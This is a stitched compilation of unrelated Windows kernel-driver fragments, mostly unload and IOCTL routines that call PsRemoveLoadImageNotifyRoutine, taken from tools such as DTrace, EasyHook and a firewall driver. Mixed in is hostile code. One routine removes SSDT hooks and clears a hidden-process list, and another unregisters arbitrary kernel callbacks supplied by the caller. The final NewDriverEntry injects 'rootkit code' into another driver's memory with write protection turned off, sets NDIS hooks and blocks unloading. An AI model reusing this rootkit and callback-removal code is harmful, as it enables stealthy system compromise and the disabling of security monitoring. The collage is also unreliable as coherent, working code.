/*
* DrvUnload
* Driver unload point
*/
extern "C" void DrvUnload(PDRIVER_OBJECT driver)
{
// Log entry
LOG("Unloading driver");
// Destroy image-load callback
LOG2("Unregistering image-load callback");
PsRemoveLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)&ImageLoadCallback);
// Destroy process-creation callback
LOG2("Unregistering process-creation callback");
NC_PROCESSCREATE_NOTIFY(ProcessCreateCallback, 1);
// Destroy thread-creation callback
LOG2("Unregistering thread-creation callback");
PsRemoveCreateThreadNotifyRoutine((PCREATE_THREAD_NOTIFY_ROUTINE)&ThreadCreateCallback);
// Unmap memory if need be
CloseLinks();
// Convert devlink string
UNICODE_STRING devLink;
RtlInitUnicodeString(&devLink, devicelink);
// Delete symlink
LOG2("Deleting sym-link to device");
IoDeleteSymbolicLink(&devLink);
// Delete device
LOG2("Deleting device");
IoDeleteDevice(driver->DeviceObject);
// Log exit
LOG("Driver unloaded");
}
void DtraceUnload(PDRIVER_OBJECT DrvObj)
{
NTSTATUS st;
LARGE_INTEGER tm;
ZwUnloadDriver(&fbtsys);
ZwUnloadDriver(&profilesys);
ZwUnloadDriver(&fttpsys);
while (dtrace_ref != 0 || dtrace_unload(DrvObj) != 0) {
tm.QuadPart = UNLOAD_RETRY_DELAY_TIME;
dprintf("dtrace.sys: Unload failed. Retry in %ds\n", abs(UNLOAD_RETRY_DELAY_TIME)/10000000);
KeDelayExecutionThread(KernelMode, FALSE, &tm);
}
PsRemoveLoadImageNotifyRoutine(ProcKernelModuleLoaded);
free_thread_list();
free_proc_list();
IoFreeWorkItem(WorkItem1);
int_freecore();
IoDeleteSymbolicLink(&deviceLink);
IoDeleteSymbolicLink(&deviceHelperLink);
IoDeleteDevice(DrvObj->DeviceObject);
}
VOID Unload(__in PDRIVER_OBJECT pDriverObject)
{
PsRemoveLoadImageNotifyRoutine(imageCallback);
FreeList();
IoDeleteSymbolicLink(&usDosDeviceName);
IoDeleteDevice(pDriverObject->DeviceObject);
}
/*
* DriverUnload
*
* Purpose:
*
* Driver unload procedure.
*
*/
VOID DriverUnload(
_In_ struct _DRIVER_OBJECT *DriverObject
)
{
PAGED_CODE();
UNICODE_STRING SymLink;
#ifdef _DEBUGMSG
DbgPrint("[TSMI] Unload, DrvObj = %p\n", DriverObject);
#endif
if (g_NotifySet) {
PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler);
}
KeWaitForSingleObject(&g_VBoxDD.Lock, Executive, KernelMode, FALSE, NULL);
if (g_VBoxDD.Chains) {
ExFreePoolWithTag(g_VBoxDD.Chains, TSUGUMI_TAG);
g_VBoxDD.Chains = NULL;
g_VBoxDD.ChainsLength = 0;
}
KeReleaseMutex(&g_VBoxDD.Lock, FALSE);
RtlInitUnicodeString(&SymLink, TSUGUMI_SYM_LINK);
IoDeleteSymbolicLink(&SymLink);
IoDeleteDevice(DriverObject->DeviceObject);
}
/**
* Unload the driver. Free all resources.
*/
VOID DrvUnload( IN PDRIVER_OBJECT pstDriverObject )
{
//
// pstDriverObject - Pointer to driver object.
//
UNICODE_STRING usDeviceLink;
dprintf( "VwFirewallDrv.sys: Unloading driver...\n" );
//
// Uninstall Filesystem Api Hooks
//
fsapihook_hook_uninstall();
//
// 结束 RDP 端口读取线程
//
procrdp_thread_readport_terminate();
//
// 卸载防火墙回调函数
//
if ( g_stSysInfo.bFirewallLoaded )
{
if ( NT_SUCCESS( SetFilterFunction( callbackFilterFunction, FALSE ) ) )
{
g_stSysInfo.bFirewallLoaded = FALSE;
}
}
//
// 卸载配置信息
//
procconfig_unload_config();
//
// Remove CreateProcessNotifyRoutine & LoadImageNotifyRoutine
//
PsSetCreateProcessNotifyRoutine( procprocess_CreateProcessNotifyRoutine, TRUE );
PsRemoveLoadImageNotifyRoutine( procprocess_LoadImageNotifyRoutine );
//
// Remove symbolic link
//
RtlInitUnicodeString( &usDeviceLink, DOS_DEVICE_NAME );
IoDeleteSymbolicLink( &usDeviceLink );
//
// Remove the device
//
IoDeleteDevice( pstDriverObject->DeviceObject );
}
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Description :
// Driver unload callback. Removes hooks, callbacks, and communication stuff.
// Parameters :
// Process :
// Removes hooks, callbacks, device driver symbolic link / device, and cleans the monitored
// processes linked list.
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
VOID Unload(PDRIVER_OBJECT pDriverObject)
{
unhook_ssdt_entries();
CmUnRegisterCallback(cookie);
PsRemoveLoadImageNotifyRoutine(imageCallback);
IoDeleteSymbolicLink(&usDosDeviceName);
IoDeleteDevice(pDriverObject->DeviceObject);
cleanMonitoredProcessList();
cleanHiddenProcessList();
}
//-----------------------------------------------------------------------------
// Unload driver
//-----------------------------------------------------------------------------
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
DbgPrint("---------------- Driver Unloaded\n");
InterlockedExchange(
(unsigned int *) &syscall_tbl[SYSCALL_INDEX(ZwLoadDriver)],
(unsigned int) orig_ZwLoadDriver);
if(mdl_sys_call)
{
MmUnmapLockedPages(syscall_tbl, mdl_sys_call);
IoFreeMdl(mdl_sys_call);
}
// remove callback
#if BREAK_POINT
PsRemoveLoadImageNotifyRoutine(add_one_time_bp);
#endif
#if DATA_MINING
PsRemoveLoadImageNotifyRoutine(add_hooks_for_data_mining);
#endif
}
VOID
DrvDumpDriverUnload(__in PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING DeviceLinkName;
DbgPrint("[*] DrvDump Unloading\n");
PsRemoveLoadImageNotifyRoutine(LoadImageCallback);
RtlInitUnicodeString(&DeviceLinkName, DRVMON_WIN32_DEVICE_NAME);
IoDeleteSymbolicLink(&DeviceLinkName);
IoDeleteDevice(DriverObject->DeviceObject);
}
/******************************************************************************
* Driver unload handler *
******************************************************************************/
static VOID DDKAPI
my_unload(PDRIVER_OBJECT DriverObject)
{
ANSI_STRING SymbolicLinkNameA;
UNICODE_STRING SymbolicLinkNameW;
DbgPrint("DriverUnload called\r\n");
PsSetCreateProcessNotifyRoutine(create_process_watcher, TRUE);
PsRemoveLoadImageNotifyRoutine(load_image_watcher);
RtlInitString(&SymbolicLinkNameA, MY_DOSDEVICE_NAME);
RtlAnsiStringToUnicodeString(&SymbolicLinkNameW, &SymbolicLinkNameA, TRUE);
IoDeleteSymbolicLink(&SymbolicLinkNameW);
IoDeleteDevice(DriverObject->DeviceObject);
for (int i = 0; i < ENT_CNT; ++i)
if(g_proc_table[i].pid)
DbgPrint("Registered process stays: %d\r\n", g_proc_table[i].pid);
}
/***************************************************
Description:
Release all resources and remove the driver object.
*/
VOID EasyHookUnload(IN PDRIVER_OBJECT InDriverObject)
{
UNICODE_STRING DosDeviceName;
// remove all hooks and shutdown thread barrier...
LhCriticalFinalize();
LhBarrierProcessDetach();
PsRemoveLoadImageNotifyRoutine(OnImageLoadNotification);
/*
Delete the symbolic link
*/
RtlInitUnicodeString(&DosDeviceName, EASYHOOK_DOS_DEVICE_NAME);
IoDeleteSymbolicLink(&DosDeviceName);
/*
Delete the device object
*/
IoDeleteDevice(InDriverObject->DeviceObject);
}
NTSTATUS RemoveCallbackNotify(PVOID InBuffer)
{
NTSTATUS Status = STATUS_SUCCESS;
PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer;
ULONG_PTR CallbackAddress = Temp->CallbackAddress;
CALLBACK_TYPE CallBackType = Temp->NotifyType;
if (!CallbackAddress ||
!MmIsAddressValid((PVOID)CallbackAddress))
{
return STATUS_UNSUCCESSFUL;
}
DbgPrint("CallBackType: %d\r\n",CallBackType);
switch(CallBackType)
{
case NotifyLoadImage:
{
DbgPrint("Remove NotifyLoadImage\r\n");
Status = PsRemoveLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)CallbackAddress);
break;
}
case NotifyCmCallBack:
{
LARGE_INTEGER Cookie;
ULONG_PTR Note = Temp->Note;
Cookie.QuadPart = 0;
DbgPrint("Remove NotifyCmCallBack\r\n");
if (WinVersion == WINDOWS_XP)
{
Cookie = XpGetRegisterCallbackCookie(Note);
}
if (WinVersion==WINDOWS_7)
{
Cookie.QuadPart = Note;
}
if (Cookie.LowPart == 0 && Cookie.HighPart == 0)
{
return STATUS_UNSUCCESSFUL;
}
Status = CmUnRegisterCallback(Cookie);
break;
}
case NotifyKeBugCheckReason:
{
PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer;
ULONG_PTR Note = Temp->Note;
if (Note!=NULL&&MmIsAddressValid((PVOID)Note))
{
KeDeregisterBugCheckReasonCallback((PKBUGCHECK_REASON_CALLBACK_RECORD)Note);
}
break;
}
case NotifyShutdown:
{
LARGE_INTEGER Cookie;
PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer;
ULONG_PTR Note = Temp->Note;
if (Note!=NULL&&MmIsAddressValid((PVOID)Note))
{
IoUnregisterShutdownNotification((PDEVICE_OBJECT)Note);
}
break;
}
case NotifyCreateThread:
{
NTSTATUS Status = STATUS_SUCCESS;
PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer;
ULONG_PTR CallbackAddress = Temp->CallbackAddress;
if (!CallbackAddress ||
!MmIsAddressValid((PVOID)CallbackAddress)||!PsRemoveCreateThreadNotifyRoutine)
{
return STATUS_UNSUCCESSFUL;
}
Status = PsRemoveCreateThreadNotifyRoutine((PCREATE_THREAD_NOTIFY_ROUTINE)CallbackAddress);
break;
}
default:
{
Status = STATUS_UNSUCCESSFUL;
}
}
return Status;
}
/*
* DevioctlDispatch
*
* Purpose:
*
* IRP_MJ_DEVICE_CONTROL dispatch.
*
*/
NTSTATUS DevioctlDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
NTSTATUS status = STATUS_SUCCESS;
PIO_STACK_LOCATION stack;
ULONG_PTR bytesIO = 0;
UNREFERENCED_PARAMETER(DeviceObject);
stack = IoGetCurrentIrpStackLocation(Irp);
if (stack != NULL) {
switch (stack->Parameters.DeviceIoControl.IoControlCode) {
case TSUGUMI_IOCTL_REFRESH_LIST:
status = TsmiLoadParameters();
if (g_NotifySet == FALSE) {
if (NT_SUCCESS(status)) {
status = PsSetLoadImageNotifyRoutine(TsmiPsImageHandler);
if (NT_SUCCESS(status)) {
g_NotifySet = TRUE;
#ifdef _DEBUGMSG
DbgPrint("[TSMI] DevioctlDispatch:NotifySet=%lx\n", g_NotifySet);
#endif
}
}
}
#ifdef _DEBUGMSG
else {
DbgPrint("[TSMI] DevioctlDispatch:Notify already installed\n");
}
#endif
bytesIO = g_NotifySet;
break;
case TSUGUMI_IOCTL_MONITOR_STOP:
bytesIO = 0;
if (g_NotifySet) {
status = PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler);
if (NT_SUCCESS(status)) {
g_NotifySet = FALSE;
bytesIO = 1;
}
}
break;
default:
status = STATUS_INVALID_PARAMETER;
};
}
else {
status = STATUS_INTERNAL_ERROR;
}
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = bytesIO;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
//--------------------------------------------------------------------------------------
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
// disable memory write protection
ClearWp();
// restore original code from image entry point
memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);
// enable memory write protection
SetWp();
NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);
DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);
if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS)
{
m_bDriverMustBeFreed = TRUE;
}
if (NT_SUCCESS(ns))
{
PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize);
if (Image)
{
// prepare rootkit code for injection into the discardable sections
memcpy(Image, m_DriverBase, m_DriverSize);
RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset));
// disable memory write protection
ClearWp();
memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize);
// enable memory write protection
SetWp();
PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset;
// set up NDIS hooks
DriverEntryInitializePayload(PointerFixup);
PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread);
DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start);
// create thread for execution copied code
HANDLE hThread = NULL;
ns = PsCreateSystemThread(
&hThread,
THREAD_ALL_ACCESS,
NULL, NULL, NULL,
Start,
m_bDriverMustBeFreed ? m_DriverBase : NULL
);
if (NT_SUCCESS(ns))
{
ZwClose(hThread);
}
else
{
DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns);
}
ExFreePool(Image);
}
// don't allow to unload target driver
DriverObject->DriverUnload = NULL;
}
return ns;
}
//--------------------------------------------------------------------------------------
void DriverUnload(PDRIVER_OBJECT DriverObject)
{
DbgMsg(__FILE__, __LINE__, "DriverUnload()\n");
PsRemoveLoadImageNotifyRoutine(LoadImageNotify);
}